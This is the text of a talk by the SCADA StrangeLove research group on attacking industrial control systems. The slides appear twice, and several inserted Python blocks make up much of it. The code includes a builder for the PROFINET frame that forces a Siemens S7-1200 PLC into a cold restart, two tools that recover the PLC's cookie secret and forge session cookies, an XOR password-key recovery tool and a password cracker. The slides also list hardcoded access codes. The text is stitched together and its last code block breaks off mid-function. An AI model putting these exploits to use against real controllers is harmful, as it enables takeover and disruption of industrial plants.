* All pictures are taken from the Dr. Strangelove movie and other Internets
Sergey Gordeychik
Aleksandr Timorin
Gleb Gritsai
SCADA STRANGELOVE
SCADA.SL
Aleksandr Timorin lifecycle:
 Studied mathematics (OMG!)
 Python developer
 Penetration tester
 ICS security researcher:
• Industrial protocols fan and 0-day PLC hunter
• SCADAStrangeLove team member
atimorin
atimorin@protonmail.ch
 WWW: who are we, why are we and what are we for?
 Milestone
 Projects:
• Past
• Present
• Future
 Results
 Group of security researchers focused on ICS/SCADA
to save Humanity from industrial disaster
and to keep Purity Of Essence
Alexander Timorin
Alexander Tlyapov
Alexander Zaitsev
Alexey Osipov
Andrey Medov
Artem Chaykin
Denis Baranov
Dmitry Efanov
Dmitry Nagibin
Dmitry Serebryannikov
Dmitry Sklyarov
Evgeny Ermakov
Gleb Gritsai
Ilya Karpov
Ivan Poliyanchuk
Kirill Nesterov
Roman Ilin
Sergey Bobrov
Sergey Drozdov
Sergey Gordeychik
Sergey Scherbel
Timur Yunusov
Valentin Shilnenkov
Vladimir Kochetkov
Vyacheslav Egoshin
Yuri Goltsev
Yuriy Dyachenko
 We work for the community and as a community
Since Stuxnet (2010) the ICS industry, and ICS security in particular, has been
on notice.
• ICS is everywhere
• Old technologies built without classic or modern security principles
• ICS networks are "isolated", but connected to other networks, and those
networks are connected to the Internet
• Sometimes (as shodan/censys/zmap/masscan scans have proved) ICS
devices are connected to the Internet directly
• Hacking ICS brings no money, so it supposedly does not attract the bad guys
• Engineers tend to say "this has worked for a long time! Don't touch it!"
• But reality shows that the bad guys do touch it, and ICS is fragile
• We were worried about it.
• We didn't accept this approach.
• We decided to change the situation.
• Then SCADASTRANGELOVE was born
Peace is our profession!
 As a group of researchers we work in different companies
 Not just one company with a private atmosphere
 Everybody can be a member
 Members have their own projects but still contribute to the long-term
projects #SCADAPASS and #SCADASOS
 We regularly give talks worldwide at security conferences:
CCC, Power of Community, CodeBlue, PacSec, PHDays,
Zeronights, Confidence, Hack.lu …
 We show and share our results with the community
 We share the research from our projects
 We share toolkits, scripts, dorks, analytics and statistics
 2012: only 4 members
 From 2013 to 2016: over 30 members
 Over 100 0-dayz
 Tons of vulnerabilities: binary, web, default credentials and
so on
 Different industries: from transportation to renewable energy
Vulnerabilities by class:
• Memory errors
• Cryptofails
• Web
• Special "features" (aka backdoors)
• Default and hardcoded credentials
• Industrial protocols
• Fun but non-profit
Vulnerabilities by vendor:
• Siemens
• General Electric
• Schneider Electric
• Yokogawa
• Honeywell
• ABB
• Advantech
• etc.
Vulnerabilities by target:
• Server/client SCADA software
• PLC, HMI, RTU
• Protective relays, actuators, converters
• Smart meters, data concentrators
• Network switches, gateways
• GSM/GPRS modems
• etc.
• Honeywell EPKS, CVE-2014-9189
• Honeywell EPKS, CVE-2014-9187 (cb is a buffer size)
• SpiderControl SCADA Web Server, stack-based buffer overflow, CVE-2015-1001
How to get firmware? How to get debug symbols? How to debug?
…PowerPC, no "operating system"
• Siemens SIPROTEC 7SJ64 (protective relay) XSS
• Siemens WinCC
WinCCExplorer.exe/PdlRt.exe
Creating and using your own security features instead of standard ones
is a bad idea!
• Hardcoded credentials show up in protocols that have authentication: SNMP,
telnet, HTTP, etc.
• You can hardcode keys, certificates, passwords
• SMA Sunny WebBox
• Siemens SIPROTEC 4 protective relay confirmation code "311299" gives access to:
- System log
- Device info
- Stack and other parts of memory
- More?
"SIPROTEC 4 and SIPROTEC Compact devices allow the display of extended
internal statistics and test information… To access this information, the
confirmation code "311299" needs to be provided when prompted."
"...Siemens does not publish official documentation on these statistics. It is
strongly recommended to work together with Siemens SIPROTEC customer care or
commissioning experts to retrieve and interpret the statistics and test
information..."
• Siemens S7-1200 PLC, CVE-2014-2252
"An attacker could cause the device to go into defect mode if specially
crafted PROFINET packets are sent to the device. A cold restart is required
to recover the system."
The trigger is just a PROFINET "Set" request: set the network info (IP,
netmask, gateway) with all-zero values.
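To make the PROFINET point usable on the defensive side, here is an added example of my own (not code from the slides or from the SCADA StrangeLove toolkit): a small Python detector that parses PROFINET DCP frames and flags a DCP Set request whose IP-parameter block carries an all-zero IP, netmask and gateway, which is the CVE-2014-2252 trigger described above. The frame layout (EtherType 0x8892, FrameID 0xFEFD, DCP header and block format) follows the PROFINET DCP specification as I know it and is not taken from the slides; the MAC addresses, the engineering-station allowlist and the helper that builds test frames are constructed for this example.

```python
import struct

# PROFINET DCP wire constants (my transcription of the PROFINET spec; not from the slides).
PROFINET_ETHERTYPE = 0x8892
DCP_FRAME_IDS = (0xFEFD, 0xFEFE, 0xFEFF)   # Get/Set, Identify request, Identify response
FRAME_ID_GET_SET = 0xFEFD
SERVICE_SET = 0x04
SERVICE_TYPE_REQUEST = 0x00
OPTION_IP, SUBOPTION_IP_PARAMETER = 0x01, 0x02
ETH_HDR_LEN, DCP_HDR_LEN = 16, 10          # eth(14)+FrameID(2); ServiceID..DCPDataLength


def build_dcp_set_ip(src_mac, dst_mac, ip, netmask, gateway, xid=0x01020304):
    """Build a unicast DCP 'Set IP parameter' request. Used here only to
    produce test frames for the detector below."""
    payload = bytes(ip) + bytes(netmask) + bytes(gateway)      # 12 bytes
    assert len(payload) == 12
    # Block = Option, Suboption, DCPBlockLength (qualifier + data),
    #         BlockQualifier (0 = temporary), data
    block = struct.pack(">BBHH", OPTION_IP, SUBOPTION_IP_PARAMETER,
                        2 + len(payload), 0) + payload
    # DCP header = ServiceID, ServiceType, Xid, ResponseDelay (reserved for Set),
    #              DCPDataLength
    dcp = struct.pack(">BBIHH", SERVICE_SET, SERVICE_TYPE_REQUEST, xid, 0, len(block)) + block
    return (bytes(dst_mac) + bytes(src_mac)
            + struct.pack(">HH", PROFINET_ETHERTYPE, FRAME_ID_GET_SET) + dcp)


def parse_dcp(frame):
    """Parse an Ethernet frame; return a dict for PROFINET DCP, else None."""
    if len(frame) < ETH_HDR_LEN + DCP_HDR_LEN:
        return None
    ethertype, frame_id = struct.unpack(">HH", frame[12:16])
    if ethertype != PROFINET_ETHERTYPE or frame_id not in DCP_FRAME_IDS:
        return None
    service_id, service_type, xid, _delay, data_len = struct.unpack(">BBIHH", frame[16:26])
    blocks, off = [], ETH_HDR_LEN + DCP_HDR_LEN
    end = min(len(frame), off + data_len)
    while off + 4 <= end:
        option, suboption, blen = struct.unpack(">BBH", frame[off:off + 4])
        blocks.append((option, suboption, frame[off + 4:off + 4 + blen]))
        off += 4 + blen + (blen & 1)        # blocks are padded to an even length
    return {"dst": frame[:6], "src": frame[6:12], "service_id": service_id,
            "service_type": service_type, "xid": xid, "blocks": blocks}


def _mac(b):
    return ":".join("%02x" % x for x in b)


def dcp_alerts(frame, engineering_macs):
    """Alert strings for one frame; empty list when nothing is suspicious.
    Only DCP Set *requests* are interesting: they rewrite device identity."""
    dcp = parse_dcp(frame)
    if (dcp is None or dcp["service_id"] != SERVICE_SET
            or dcp["service_type"] != SERVICE_TYPE_REQUEST):
        return []
    alerts = []
    if dcp["src"] not in engineering_macs:
        alerts.append("DCP Set from non-engineering station %s" % _mac(dcp["src"]))
    for option, suboption, body in dcp["blocks"]:
        if (option, suboption) == (OPTION_IP, SUBOPTION_IP_PARAMETER):
            params = body[2:]                # skip the 2-byte BlockQualifier
            if len(params) != 12:
                alerts.append("malformed IP parameter block (%d bytes)" % len(params))
            elif params == bytes(12):
                alerts.append("DCP Set IP with all-zero ip/netmask/gateway "
                              "(CVE-2014-2252 pattern) to %s" % _mac(dcp["dst"]))
    return alerts


if __name__ == "__main__":
    # Constructed sample traffic: one benign commissioning Set, one all-zero Set.
    ENGINEERING = {bytes.fromhex("001b1b010203")}
    PLC, ROGUE = bytes.fromhex("001c0611ee01"), bytes.fromhex("deadbeef0001")
    benign = build_dcp_set_ip(next(iter(ENGINEERING)), PLC,
                              [192, 168, 0, 10], [255, 255, 255, 0], [192, 168, 0, 1])
    zero = build_dcp_set_ip(ROGUE, PLC, bytes(4), bytes(4), bytes(4))
    for f in (benign, zero):
        print(dcp_alerts(f, ENGINEERING))
```

A Set request is a commissioning operation: on a running plant it should come only from known engineering stations, so the detector also alerts on any Set from a MAC outside the allowlist, not just on the all-zero case. Feed it frames from a span port on the PROFINET segment one at a time.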
KIOSK mode: limit access to OS functions
• WinCC accounts: the "secret" crypto key is fixed (hardcoded)
• It's XOR; they should not have bothered hardcoding a key for XOR
PLC password “encryption”
Password (8 bytes)
• TIA Portal PEData.plf: password history
• WinCCWebBridge.dll: please hash your hardcoded account
• Siemens S7-1200, S7-1500 PLC, CVE-2014-2250, CVE-2014-2251
• Seed = plc_start_time + const
Target – Siemens S7-1200 PLC
PmzR9733Q8rG3LpwjCGZT9N/ocMAAQABAAKK1woAqsgAAAAAAAAAAIrXIUM=
uLiHXZUTy2GMgjr1KmgmcNN/ocMAAQACAAKK1woAqsgAAAAAAAAAAIrXIUM=
Mu/vgiIgtrxq0LVp26nkMtN/ocMAAQADAAKK1woAqsgAAAAAAAAAAIrXIUM=
tjH6vtNWCfa+QZHPDtCnKdN/ocMAAgADAAKK1woAqsgAAAAAAAAAAIrXIUM=
3e6cd1f7bdf743cac6dcba708c21994fd37fa1c30001000100028ad70a00aac800000000000000008ad72143
b8b8875d9513cb618c823af52a682670d37fa1c30001000200028ad70a00aac800000000000000008ad72143
32efef822220b6bc6ad0b569dba9e432d37fa1c30001000300028ad70a00aac800000000000000008ad72143
b631fabed35609f6be4191cf0ed0a729d37fa1c30002000300028ad70a00aac800000000000000008ad72143
3e6cd1f7bdf743cac6dcba708c21994f  MD5 of ? (16 bytes)
d37fa1c3                          CONST (4 bytes)
0001                              user logout counter (2 bytes)
0001                              counter of issued cookies for this user (2 bytes)
00028ad7                          value that doesn't matter (4 bytes)
0a00aac8                          user IP address (10.0.170.200) (4 bytes)
00000000000000008ad72143          value that doesn't matter (12 bytes)
What about 3e6cd1f7bdf743cac6dcba708c21994f?
MD5(NEXT 26 BYTES OF COOKIE + 16 BYTES OF SECRET + 2 NULL BYTES)
What is SECRET?
SECRET is generated after PLC start by a ~PRNG.
The PRNG is a little bit harder than the standard C PRNG.
SEED in [0x0000, 0xFFFF]
SEED very often depends on a time value
SEED = PLC START TIME + 320
320 was found the practical way: the secret is generated ~3-4 seconds after
PLC start, using the current time
PLC START TIME = CURRENT TIME – UPTIME
Current time via the web interface
Uptime via SNMP with the hardcoded read community string "public"
PROFINET "feature" + PRNG vulnerability = a real attack vector.
Result: PLC takeover.
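The cookie layout and the MD5 construction on the slides can be turned directly into working code. This is an added example of my own, not the group's tool: it decodes the first sample cookie into the fields listed above, checks any cookie against a candidate secret with the formula MD5(next 26 bytes of cookie + 16-byte secret + 2 null bytes), derives seed candidates from the two values an attacker can read (current time from the web interface, uptime via SNMP), and walks those candidates until one verifies. The 16-byte test secret and demo_prng are constructed stand-ins, because the real PRNG is not on the slides; mint_cookie models how the PLC issues a cookie so the verifier can be exercised (with a recovered secret it is exactly the forgery the slide calls PLC takeover); and how the time value maps onto the 16-bit seed is not on the slides either, so taking the low 16 bits is my assumption.

```python
import base64
import hashlib
import hmac
import struct

# Constructed sample: the first cookie from the slide, in its base64 form.
SAMPLE_COOKIE = "PmzR9733Q8rG3LpwjCGZT9N/ocMAAQABAAKK1woAqsgAAAAAAAAAAIrXIUM="

COOKIE_LEN = 44        # 16-byte MD5 + 28 bytes of fields
HASHED_SPAN = 26       # slide: the MD5 covers the next 26 bytes after the digest
SECRET_LEN = 16
SEED_OFFSET = 320      # slide: secret generated ~3-4 s after start; 320 found empirically
CONST = bytes.fromhex("d37fa1c3")


def _split(cookie_b64):
    raw = base64.b64decode(cookie_b64)
    if len(raw) != COOKIE_LEN:
        raise ValueError("unexpected cookie length %d" % len(raw))
    return raw[:16], raw[16:]


def parse_cookie(cookie_b64):
    """Decode a cookie into the fields described on the slide."""
    digest, body = _split(cookie_b64)
    const, logout_ctr, issue_ctr, unused, ip = struct.unpack(">4sHHI4s", body[:16])
    return {
        "md5": digest.hex(),
        "const": const.hex(),
        "logout_counter": logout_ctr,
        "cookie_counter": issue_ctr,
        "unused": unused,
        "ip": ".".join(str(b) for b in ip),
        "tail": body[16:].hex(),
    }


def _digest(body, secret):
    if len(secret) != SECRET_LEN:
        raise ValueError("secret must be 16 bytes")
    # Slide: MD5(next 26 bytes of cookie + 16 bytes of secret + 2 null bytes)
    return hashlib.md5(body[:HASHED_SPAN] + secret + b"\x00\x00").digest()


def verify_cookie(cookie_b64, secret):
    """True if the cookie's MD5 matches the slide's formula under this secret."""
    digest, body = _split(cookie_b64)
    return hmac.compare_digest(_digest(body, secret), digest)


def mint_cookie(secret, logout_ctr, cookie_ctr, ip, unused=0x00028ad7,
                tail=bytes.fromhex("00000000000000008ad72143")):
    """Issue a cookie the way the slide describes the PLC doing it. With a
    recovered secret this is also the forgery step."""
    ip_bytes = bytes(int(o) for o in ip.split("."))
    body = CONST + struct.pack(">HHI", logout_ctr, cookie_ctr, unused) + ip_bytes + tail
    assert len(body) == COOKIE_LEN - 16
    return base64.b64encode(_digest(body, secret) + body).decode()


def candidate_seeds(current_time, uptime_seconds, slack=2):
    """Seed candidates from observable values: current time (web UI) and
    uptime (SNMP 'public'). Assumption: seed = low 16 bits of start + 320,
    with +/- slack seconds for the imprecise 3-4 s delay."""
    start = int(current_time) - int(uptime_seconds)
    return [(start + SEED_OFFSET + d) & 0xFFFF for d in range(-slack, slack + 1)]


def demo_prng(seed):
    """Constructed stand-in for the PLC's PRNG (the real one is not on the
    slides): 16 bytes derived deterministically from a 16-bit seed."""
    return hashlib.md5(struct.pack(">H", seed & 0xFFFF)).digest()


def recover_secret(cookie_b64, prng, seeds):
    """Try each seed, derive the secret with prng(seed), and return the first
    seed whose secret verifies the captured cookie (None if none does)."""
    for seed in seeds:
        if verify_cookie(cookie_b64, prng(seed)):
            return seed
    return None


if __name__ == "__main__":
    print(parse_cookie(SAMPLE_COOKIE))
    seeds = candidate_seeds(1_400_000_000, 3600)      # constructed time/uptime
    captured = mint_cookie(demo_prng(seeds[3]), 1, 1, "10.0.170.200")
    print("recovered seed:", recover_secret(captured, demo_prng, seeds))
```

The point of candidate_seeds is the search space: the slide's 16-bit seed would already be trivial to brute force, and once the seed is pinned to start time + 320 the search collapses to a handful of candidates, each checked with one MD5 against a single captured cookie.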
- Hash passwords
- SHA is not good enough
- Put the length of the plaintext nearby
Red-box value = len(pwd)*2+1
"Secure" setting of the speed of a power turbine
More details in "SCADA deep inside: protocols and security mechanisms"
Industrial protocols: S7-300 PLC password cracker, included in the popular
tool thc-hydra.
Don’t patch too much
Wait a second….
 We work with a responsible disclosure approach
 Full disclosure = all vulnerability details immediately in the wild, giving
the vendors no opportunity to release a fix
 Responsible disclosure = the researcher contacts the vendor before the
vulnerability is released, and all stakeholders agree on a period of time for
the vulnerability to be patched before the details are published.
 Vulnerability patching is very important for ICS and can take months.
Even years.
 That's why responsible disclosure is highly important in ICS
1. Research
2. We send details directly to vendor and CERT
3. Vendor assigns a CVE
4. Vulnerability patched
5. SCADASL public disclosure and exploit/toolkit publishing
6. Applause to SCADASL
7. Research
8. …
Analytics every year:
 ICSMAP
 ICSDORKS
 #SCADAPASS
• Release 1.2
• 37 vendors
• PLC, RTU, gateways, switches, servers …
 #SCADASOS
(un)Secure Open SmartGrids is an open initiative to raise awareness of the
insecurity of SmartGrid, photovoltaic power stations and wind farms
Q: How to participate?
A: Find Internet-connected PV and wind power stations and notify vendors/CERTs/community.
Q: Wow! It's simple! Can I hack it?
A: No. It can be a hospital or your grandma's cottage. Please use a passive approach (firmware analysis, testbeds etc.)
Q: I got a 0day!
A: Please submit it to the vendor and/or regional CERT
Q: What will I get?
A: Kudos at SCADA StrangeLove talks / knowledge / a safer world.
Details
You can make a Shodan saved search or drop Google dorks on Twitter
Please use the tags #solar #wind #scadasos
 60 000+ SmartGrid devices disconnected from the Internet
 Two Advisories
• XZERES 442SR Wind Turbine CSRF
• SMA Solar Technology AG Sunny WebBox Hard-Coded
Account Vulnerability
Current and future:
 Smart energy generation
 Railroad and signaling systems
 Digital substations
 GSM/GPRS modems
 The well-known, familiar world of information security is growing up,
evolving and changing quickly
 Because a lot of specialists are involved in it
 Unfortunately the ICS security area is not very mobile or changeable
 Also our team members are growing older and starting families
 We think that our mission has been done successfully
 But it is not finished yet….
Still trying to hack ICS, son?
Have you ever heard about SCADASTRANGELOVE?!
 All materials at SCADA.SL
 We hope that our work can help you create your own projects. But don't
forget about the community and the responsible disclosure principle
* All pictures are taken from Google and other Internets
Alexander Timorin
Alexander Tlyapov
Alexander Zaitsev
Alexey Osipov
Andrey Medov
Artem Chaykin
Denis Baranov
Dmitry Efanov
Dmitry Nagibin
Dmitry Serebryannikov
Dmitry Sklyarov
Evgeny Ermakov
Gleb Gritsai
Ilya Karpov
Ivan Poliyanchuk
Kirill Nesterov
Roman Ilin
Sergey Bobrov
Sergey Drozdov
Sergey Gordeychik
Sergey Scherbel
Timur Yunusov
Valentin Shilnenkov
Vladimir Kochetkov
Vyacheslav Egoshin
Yuri Goltsev
Yuriy Dyachenko

Attacking SCADA systems: Story Of SCADASTRANGELOVE

  • 2. Aleksandr Timorin lifecycle:  Studied mathematics (OMG!)  Python developer  Penetration tester  ICS security researcher: • Industrial protocols fan and 0-day PLC hunter • SCADAStrangeLove team member atimorin atimorin@protonmail.ch
  • 3.  WWW: who are we, why are we and what are we for?  Milestone  Projects: • Past • Present • Future  Results
  • 4.
  • 5.  Group of security researchers focused on ICS/SCADA to save Humanity from industrial disaster and to keep Purity Of Essence Alexander Timorin Alexander Tlyapov Alexander Zaitsev Alexey Osipov Andrey Medov Artem Chaykin Denis Baranov Dmitry Efanov Dmitry Nagibin Dmitry Serebryannikov Dmitry Sklyarov Evgeny Ermakov Gleb Gritsai Ilya Karpov Ivan Poliyanchuk Kirill Nesterov Roman Ilin Sergey Bobrov Sergey Drozdov Sergey Gordeychik Sergey Scherbel Timur Yunusov Valentin Shilnenkov Vladimir Kochetkov Vyacheslav Egoshin Yuri Goltsev Yuriy Dyachenko
  • 6.  We work for community and as community
  • 7. Since Stuxnet (2010) the ICS industry, and ICS security in particular, has been on notice.
  • 8. • ICS is everywhere • Old technologies, built without classic or modern security principles • ICS networks are “isolated”, but connected to other networks, and those networks are connected to the Internet • Sometimes (Shodan/Censys/zmap/masscan proved it) ICS devices are connected to the Internet directly • Hacking ICS brings no money, so it does not attract the bad guys • Engineers tend to say “this has worked for a long time! Don’t touch it!”
  • 9. • But reality shows us that the bad guys do touch them, and ICS is so tender • We were worried about it • We didn’t accept this approach • We decided to change the situation • Then SCADASTRANGELOVE was born
  • 10. Peace is our profession!
  • 11.  As a group of researchers we work for different companies  Not one company with its own private atmosphere  Everybody can be a member
  • 12. Members have their own projects but still contribute to the long-term projects #SCADAPASS and #SCADASOS
  • 13.  We regularly give talks at security conferences worldwide: CCC, Power of Community, CodeBlue, PacSec, PHDays, Zeronights, Confidence, Hack.lu …  We show and share our results with the community  We share the research from our projects  We share toolkits, scripts, dorks, analytics and statistics
  • 14.  2012: only 4 members  From 2013 to 2016: over 30 members  Over 100 0-dayz  Tons of vulnerabilities: binary, web, default credentials and so on  Different industries: from transportation to renewable energy
  • 15. Vulnerabilities: • Memory errors • Cryptofails • Web • Special “features” (aka backdoors) • Default and hardcoded credentials • Industrial protocols • Fun but non-profit
  • 16. Vulnerabilities: • Siemens • General Electric • Schneider Electric • Yokogawa • Honeywell • ABB • Advantech • etc
  • 17. Vulnerabilities: • Server/client SCADA software • PLC, HMI, RTU • Protective relays, actuators, converters • Smart meters, data concentrators • Network switches, gateways • GSM/GPRS modems • etc
  • 18. • Honeywell EPKS, CVE-2014-9189
  • 19. • Honeywell EPKS, CVE-2014-9187
  • 20. • cb is a buffer size
  • 21. • SpiderControl SCADA Web Server, stack-based BoF, CVE-2015-1001
  • 22.
  • 23. How to get the firmware? How to get debug symbols? How to debug? ...PowerPC, no “operating system”
  • 24.
  • 25.
  • 26.
  • 27. • Siemens SIPROTEC 7SJ64 (protective relay) XSS
  • 29.
  • 30.
  • 31. WinCCExplorer.exe/PdlRt.exe: creating and using your own security features instead of the standard ones is a bad idea!
  • 32. • Hardcoded credentials show up in any protocol with authentication: SNMP, telnet, HTTP, etc. • Keys, certificates and passwords can all be hardcoded • Example: SMA Sunny WebBox
  • 33. • Siemens SIPROTEC 4 protective relay confirmation code “311299”: - System log - Device info - Stack and other parts of memory - More ?
  • 34. • Siemens SIPROTEC 4 protective relay confirmation code “311299”: “SIPROTEC 4 and SIPROTEC Compact devices allow the display of extended internal statistics and test information… To access this information, the confirmation code “311299” needs to be provided when prompted.” “...Siemens does not publish official documentation on these statistics. It is strongly recommended to work together with Siemens SIPROTEC customer care or commissioning experts to retrieve and interpret the statistics and test information...”
  • 35. • Siemens S7-1200 PLC, CVE-2014-2252 “An attacker could cause the device to go into defect mode if specially crafted PROFINET packets are sent to the device. A cold restart is required to recover the system.” It only takes a PROFINET “set” request that sets the network info (IP, netmask, gateway) to all-zero values.
  • 36. KIOSK mode: Limit access to OS functions
  • 37. KIOSK mode: Limit access to OS functions
  • 38. • WinCC accounts: the “secret” crypto key
  • 39. • WinCC accounts: the “secret” crypto key is fixed • It’s just XOR, so a hardcoded key buys nothing; they should not have bothered
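Added example (not from the talk or the SCADASL toolkit): why a fixed XOR key is no protection at all. One account whose password you already know, for example your own operator login, is enough to recover the key and read every other stored password. The key, the account names and the passwords below are constructed for the demo; the real WinCC key is not reproduced.

```python
from itertools import cycle

# Constructed stand-in for a hard-coded XOR key (NOT the real WinCC key).
HARDCODED_KEY = b"Sup3rSecretXOR"  # 14 bytes

# The one password the attacker legitimately knows: at least 2 x key length.
KNOWN_OPERATOR_PASSWORD = b"OperatorPassword-Line7-2016!"  # 28 bytes


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Encryption and decryption are the same operation."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


# Constructed account store: name -> XOR-"encrypted" password blob.
ACCOUNT_STORE = {
    "operator": xor_with_key(KNOWN_OPERATOR_PASSWORD, HARDCODED_KEY),
    "Administrator": xor_with_key(b"Adm1n-WinCC-Project-2016", HARDCODED_KEY),
    "engineer": xor_with_key(b"Eng!neer#42", HARDCODED_KEY),
}


def recover_key(ciphertext: bytes, known_plaintext: bytes):
    """Known-plaintext attack: C = P ^ K, hence C ^ P = K repeated.
    The key length is the smallest period of the recovered keystream.
    The known plaintext must be at least twice as long as the key so the
    repetition is actually observed; otherwise only a key prefix is known
    and None is returned rather than a guess."""
    stream = xor_with_key(ciphertext[: len(known_plaintext)], known_plaintext)
    for period in range(1, len(stream) // 2 + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return None


def decrypt_store(store: dict, key: bytes) -> dict:
    """Decrypt every stored password with the recovered key."""
    return {name: xor_with_key(blob, key) for name, blob in store.items()}


def attack(store: dict, own_account: str, own_password: bytes) -> dict:
    """Recover the key from the one account you control, then read all others."""
    key = recover_key(store[own_account], own_password)
    if key is None:
        raise ValueError("known plaintext too short to confirm the key length")
    return decrypt_store(store, key)


if __name__ == "__main__":
    for name, pwd in attack(ACCOUNT_STORE, "operator", KNOWN_OPERATOR_PASSWORD).items():
        print(f"{name}: {pwd.decode()}")
```

The check in recover_key is the practical caveat: a short known password only reveals a prefix of the key, which is why the attacker wants a long password on the account they control.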
  • 41. • TIA Portal PEData.plf passwords history
  • 42. • Winccwebbridge.dll: please hash your hardcoded account
  • 43. • Siemens S7-1200, S7-1500 PLC, CVE-2014-2250, CVE-2014-2251
  • 44. • Siemens S7-1200, S7-1500 PLC, CVE-2014-2250, CVE-2014-2251 • Seed = plc_start_time + const
  • 45. Target – Siemens S7-1200 PLC
  • 47. Cookie layout:
    3e6cd1f7bdf743cac6dcba708c21994f  MD5 of ? (16 bytes)
    d37fa1c3                          CONST (4 bytes)
    0001                              user logout counter (2 bytes)
    0001                              counter of issued cookies for this user (2 bytes)
    00028ad7                          value that doesn’t matter (4 bytes)
    0a00aac8                          user IP address (10.0.170.200) (4 bytes)
    00000000000000008ad72143          value that doesn’t matter (12 bytes)
    What about 3e6cd1f7bdf743cac6dcba708c21994f?
  • 48. MD5(NEXT 26 BYTES OF COOKIE + 16 BYTES OF SECRET + 2 NULL BYTES). What is SECRET? SECRET is generated after PLC start by a PRNG, a little more complex than the standard C PRNG. SEED is in the range 0x0000..0xFFFF.
  • 49. SEED very often depends on a time value: SEED = PLC START TIME + 320. The 320 was found empirically: the secret is generated ~3-4 seconds after PLC start using the current time. PLC START TIME = CURRENT TIME – UPTIME. Current time is available via the web interface; uptime via SNMP with the hardcoded read community string “public”.
  • 50. The PROFINET “feature” (CVE-2014-2252) and the PRNG vulnerability (CVE-2014-2250/2251) together give a real attack vector. Result: PLC takeover.
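Added example, not the original exploit code: the cookie attack from slides 43-50 as a worked Python model. The field layout, the MD5 formula and the "start time + 320" rule are taken from the slides. Everything else is an assumption: the PRNG is a constructed C-style LCG stand-in (the real generator is not published here, only its 16-bit seed space matters), the seed is assumed to be the low 16 bits of start time + 320, and since the slide's field layout adds up to 28 bytes while the hash description covers 26, the digest is assumed to cover the first 26 bytes after it. Current time and sysUpTime are constructed inputs standing in for the web interface and the SNMP query.

```python
import hashlib
import struct

# Example cookie from the slide (hex): 16-byte digest + 28 bytes of fields.
SLIDE_COOKIE = ("3e6cd1f7bdf743cac6dcba708c21994f" "d37fa1c3" "0001" "0001"
                "00028ad7" "0a00aac8" "00000000000000008ad72143")
CONST = bytes.fromhex("d37fa1c3")


def parse_cookie(cookie_hex: str) -> dict:
    """Split the cookie into the fields named on the slide."""
    raw = bytes.fromhex(cookie_hex)
    if len(raw) != 44:
        raise ValueError("unexpected cookie length")
    logout_counter, cookie_counter = struct.unpack(">HH", raw[20:24])
    return {
        "digest": raw[:16],
        "const": raw[16:20],
        "logout_counter": logout_counter,
        "cookie_counter": cookie_counter,
        "unknown1": raw[24:28],
        "ip": ".".join(str(b) for b in raw[28:32]),
        "unknown2": raw[32:44],
    }


def secret_from_seed(seed: int) -> bytes:
    """Stand-in for the PLC's boot-time generator. ASSUMPTION: a C-style LCG
    driven by a 16-bit seed. The real SIMATIC generator differs; the attack
    only needs the seed space to be 16 bits wide."""
    state = seed & 0xFFFF
    out = bytearray()
    for _ in range(16):
        state = (1103515245 * state + 12345) & 0x7FFFFFFF
        out.append((state >> 16) & 0xFF)
    return bytes(out)


def cookie_digest(tail: bytes, secret: bytes) -> bytes:
    """MD5(next 26 bytes of the cookie || 16-byte SECRET || 2 NUL bytes).
    ASSUMPTION: the 26 covered bytes are the first 26 after the digest."""
    return hashlib.md5(tail[:26] + secret + b"\x00\x00").digest()


def build_cookie(secret: bytes, logout_counter: int, cookie_counter: int, ip: str,
                 unknown1: bytes = b"\x00\x02\x8a\xd7", unknown2: bytes = bytes(12)) -> str:
    """Assemble a cookie for chosen counters and IP and sign it with SECRET."""
    tail = (CONST + struct.pack(">HH", logout_counter, cookie_counter) + unknown1
            + bytes(int(o) for o in ip.split(".")) + unknown2)
    return (cookie_digest(tail, secret) + tail).hex()


def seed_candidates(now_epoch: int, sys_uptime_ticks: int, slack: int = 5) -> list:
    """PLC start time = current time - uptime. sysUpTime (read over SNMP with
    the default community 'public') counts 1/100 s. SEED = start time + 320,
    truncated to 16 bits (ASSUMPTION); +/- slack seconds covers the 3-4 s jitter."""
    start = now_epoch - sys_uptime_ticks // 100
    return [(start + 320 + d) & 0xFFFF for d in range(-slack, slack + 1)]


def recover_seed(cookie_hex: str, candidates):
    """Return the seed whose SECRET reproduces a captured cookie's digest, or None."""
    raw = bytes.fromhex(cookie_hex)
    digest, tail = raw[:16], raw[16:]
    for seed in candidates:
        if cookie_digest(tail, secret_from_seed(seed)) == digest:
            return seed
    return None


if __name__ == "__main__":
    now, uptime_ticks = 1_450_000_000, 12_345_600            # constructed inputs
    seed = (now - uptime_ticks // 100 + 322) & 0xFFFF        # PLC seeded 2 s after boot
    captured = build_cookie(secret_from_seed(seed), 1, 1, "10.0.170.200")
    found = recover_seed(captured, seed_candidates(now, uptime_ticks))
    print("recovered seed:", hex(found))
    print("forged cookie :", build_cookie(secret_from_seed(found), 1, 2, "10.0.170.13"))
```

Two points the code makes concrete: with the uptime trick the search is a handful of MD5 calls, and even blind, 65536 seeds is a fraction of a second, so the SNMP query only saves the attacker from guessing the jitter. Once SECRET is known, any counters and any client IP can be signed.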
  • 51.
  • 52. Password storage: - passwords are hashed - but plain SHA is not good enough - and the length of the plaintext is stored right next to the hash: Redbox_value = len(pwd)*2+1
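Added example, not from the talk: what the length leak on slide 52 is worth to an attacker, and what the storage should look like instead. SHA-1, the 36-symbol alphabet and the passwords are demo choices; the slide does not name the exact SHA variant.

```python
import hashlib
import hmac
import itertools
import os
import string

ALPHABET = string.ascii_lowercase + string.digits  # 36 symbols, for the demo


def store_weak(password: str) -> dict:
    """Storage as described on the slide: an unsalted SHA digest plus a
    field next to it that encodes the plaintext length as len(pwd)*2 + 1."""
    return {"hash": hashlib.sha1(password.encode()).hexdigest(),
            "redbox": len(password) * 2 + 1}


def leaked_length(record: dict) -> int:
    """Invert the 'red box' value to get the exact password length."""
    return (record["redbox"] - 1) // 2


def search_space(alphabet_size: int, max_len: int, known_len=None) -> int:
    """Candidates to try: all lengths up to max_len, or exactly one length
    when the record leaks it."""
    if known_len is not None:
        return alphabet_size ** known_len
    return sum(alphabet_size ** k for k in range(1, max_len + 1))


def crack_weak(record: dict, alphabet: str = ALPHABET, max_len: int = 8):
    """Brute force an unsalted record, trying only the leaked length."""
    n = leaked_length(record)
    if n > max_len:
        return None
    for cand in itertools.product(alphabet, repeat=n):
        pwd = "".join(cand)
        if hashlib.sha1(pwd.encode()).hexdigest() == record["hash"]:
            return pwd
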